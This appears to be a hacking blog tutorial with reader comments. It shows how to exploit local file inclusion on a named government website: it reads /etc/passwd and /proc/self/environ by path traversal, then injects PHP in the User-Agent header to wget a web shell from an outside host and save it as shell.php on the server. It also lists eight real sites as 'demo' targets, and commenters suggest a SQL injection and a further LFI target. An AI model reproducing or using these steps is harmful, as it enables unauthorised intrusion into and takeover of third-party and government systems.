Lets Starts
Few Things You Need to Start
1) Site vulnerable to LFI ( http://www.bislig.gov.ph )2) Remote shell ( http://www.yourhosting/urshell.txt
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/
4) Mozilla Firefox Browser
Try to open etc/passwd
Example: http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
Ok fine...We can open etc/passwd
Now type proc/self/environ
Example:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environNow download and install User-Agent switcher.
Go to Tools > Default User-Agent > Edit User Agents
You will get this window.
Now make new user-agentGo to New > New User-AgentGo to Tools > Default User-Agent > Edit User Agents
You will get this window.
You will get something like this:
Now leave everything as it is exept description and user-agent.
In description enter name of it (Mine is phpinfo)
In User-Agent paste this in there.
In description enter name of it (Mine is phpinfo)
In User-Agent paste this in there.
Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)
Go to your site and refresh it.
You should get something like this in your site.
Go to your site and refresh it.
You should get something like this in your site.
Now search for "disable_functions" (Ctrl+F Search function)
Mine is
That is good.We can spawn our shell now!
Now go back and edit your User-Agent.
Change "User-Agent" to:
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>Now go back and edit your User-Agent.
Change "User-Agent" to:
(What this function do?. It downloads shell in .txt format and renames it as shell.php)
Save it and refresh your site.
Go to http://www.LFISITE.com/shell.php (Mine is http://www.bislig.gov.ph/shell.php )
Voila,we have our shell up.
Enjoy.
Demo websites :)
http://hwcf.com.pk/golf/index.php?page=....lf/environ
http://www.lrh.gov.pk/Nursing_School/ind...lf/environ
http://www.aladde.org/index.php?load=../...lf/environ
http://www.findinsl.com/index.php?load=....lf/environ
http://www.holzprof.ee/index.php?action=...lf/environ
http://www.bislig.gov.ph/content1.php?pa...lf/environ
http://www.tendokarate.no/index.php?page...lf/environ
http://www.cranberries-gifts.co.uk/categ...lf/environ







8 comments:
nice Tutorial(MaC)
Thnks for the share
really nice1....
really a nice one....
example site fix now
is the shell still there??
not fixed ... Try sql injection content1.php?mainmenu_id=54'
!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
Post a Comment
If you're having issues, Please leave an email address I can contact you on -
I advise you to also "subscribe to the comment feed" and get email updates when I respond to your question.
Hyperlinks are not allowed, Spam/advertising comments will NEVER BE TOLERATED and will be deleted immediately!
Thanks for reading,
Admin